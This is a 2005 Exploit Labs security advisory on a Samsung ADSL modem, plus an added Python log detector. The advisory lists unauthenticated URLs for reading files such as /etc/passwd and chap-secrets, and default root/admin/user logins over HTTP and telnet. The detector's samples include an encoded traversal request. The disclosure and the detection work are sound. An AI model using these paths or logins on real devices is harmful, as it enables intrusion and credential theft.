
Exploit Labs Security Advisory 2005.2
Posted Mar 22, 2005
Authored by Donnie Werner, Exploit Labs | Site exploitlabs.com

EXPL-A-2005-002 exploitlabs.com Advisory 031 - The Samsung ADSL Modem ships with default root, admin, and user accounts and also allows for arbitrary file access on the underlying filesystem.

tags | exploit, arbitrary, root
SHA-256 | 8781cdcc8a0e6d219a4402867b7c5194121711e509530df3a557353ae00e8bfe

------------------------------------------------------------
- EXPL-A-2005-002 exploitlabs.com Advisory 031 -
------------------------------------------------------------
- Samsung ADSL Modem -






AFFECTED PRODUCTS
=================
Samsung ADSL Modem

Samsung Electronics
http://www.samsung.com


DETAILS
=======
1. Arbitrary reading of files
2. Default root password
3. root file system access


Known issues exist in Boa httpd as per:
FreeBSD-SA-00:60 Security Advisory

http://www.securiteam.com/unixfocus/6G0081P0AI.html and
http://lists.insecure.org/lists/bugtraq/2000/Oct/0445.html

note:
This is a hardware-based product with a built-in httpd for
remote access. This is a separate issue from the ones
formally presented above, but it carries the same implications.


Identification:

HTTP/1.0 400 Bad Request
Date: Sat, 03 Jan 1970 17:57:18 GMT
Server: Boa/0.93.15
Connection: close
Content-Type: text/html

Modem vendor Samsung Electronics (co) modem
co chipset vendor b500545354430002
cpe chipset vendor Samsung Electronics (co) cpe chipset
software version SMDK8947v1.2 Jul 11 2003 10:00:01
ADSL DMT version a-110.030620-10130710


Samsung ADSL modems run uClinux OS
http://www.uclinux.com

note:
Depending on the implementation, other products
using a combination of Boa / uClinux may be
affected as well.


Item 1
=====
http://[someSamsung.ip]/etc/passwd
http://[someSamsung.ip]/etc/hosts
http://[someSamsung.ip]/bin/
http://[someSamsung.ip]/dev/
http://[someSamsung.ip]/lib/
http://[someSamsung.ip]/tmp/

http://[someSamsung.ip]/var/ppp/chap-secrets

http://[someSamsung.ip]/bin/sh

Any remote user may request any file present
in the router/modem OS file system.
Files can be fetched unauthenticated via a
GET request in a browser.
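
Added example (not part of the original advisory): detection logic
for the requests described in Item 1, run over web access logs. It
assumes an upstream proxy or sensor records requests to the modem in
Common Log Format; the log lines, addresses and function names are
constructed for illustration.

```python
import re
from posixpath import normpath
from urllib.parse import unquote, urlsplit

# System paths requested in Item 1; a modem web UI has no reason to serve them.
SENSITIVE_PREFIXES = ("/etc/", "/bin/", "/dev/", "/lib/", "/tmp/", "/var/ppp/")

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
CLF = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Constructed sample lines (documentation address ranges), not captured traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [22/Mar/2005:10:00:01 +0000] "GET /etc/passwd HTTP/1.0" 200 312',
    '198.51.100.7 - - [22/Mar/2005:10:00:03 +0000] "GET /cgi-bin/%2e%2e/var/ppp/chap-secrets HTTP/1.0" 200 64',
    '192.0.2.10 - admin [22/Mar/2005:10:01:00 +0000] "GET /cgi-bin/adsl.cgi HTTP/1.0" 200 2048',
    '192.0.2.10 - - [22/Mar/2005:10:02:00 +0000] "GET /etc/shadow HTTP/1.0" 404 0',
    '192.0.2.10 - - [22/Mar/2005:10:02:05 +0000] "GET /etcetera.html HTTP/1.0" 200 10',
]

def canonical_path(target):
    """Drop the query, percent-decode, and collapse dot segments and slashes."""
    if target.startswith(("http://", "https://")):  # absolute-form (proxy logs)
        target = urlsplit(target).path
    path = unquote(target.partition("?")[0])
    return normpath("/" + path.lstrip("/"))

def find_exposed_reads(lines):
    """Return (source, path) for successful unauthenticated reads of system paths."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m or m["method"] not in ("GET", "HEAD"):
            continue
        path = canonical_path(m["target"])
        served = m["status"].startswith("2")   # the file was actually returned
        anonymous = m["user"] == "-"           # no authenticated user logged
        # Appending "/" lets "/bin" and "/bin/" both match without matching "/binx".
        if served and anonymous and (path + "/").startswith(SENSITIVE_PREFIXES):
            hits.append((m["src"], path))
    return hits

if __name__ == "__main__":
    for src, path in find_exposed_reads(SAMPLE_LOG):
        print(f"ALERT unauthenticated read of {path} from {src}")
```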


Item 2
=====
Default user login / passwords exist in both
httpd ( http://[host]/cgi-bin/adsl.cgi) and telnet ports

root/root
admin/admin
user/user


Item 3
======
By telnetting to the device and logging in as
root/root, remote users may access the filesystem.
The modem provides 256 MB of RAM for OS and
file system operations. In this implementation
there is approx. 120 MB of free file system space,
which allows for the possibility of remote
attackers using the file system for malicious
communication and file storage. This allows
many scenarios, such as storing worm and/or
viral code.

#echo "some bad data" >file



SOLUTION:
=========
none to date

Samsung has been contacted
No patch released



Credits
=======
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs

Donnie Werner

mail: morning_wood@zone-h.org
--
web: http://exploitlabs.com
web: http://zone-h.org
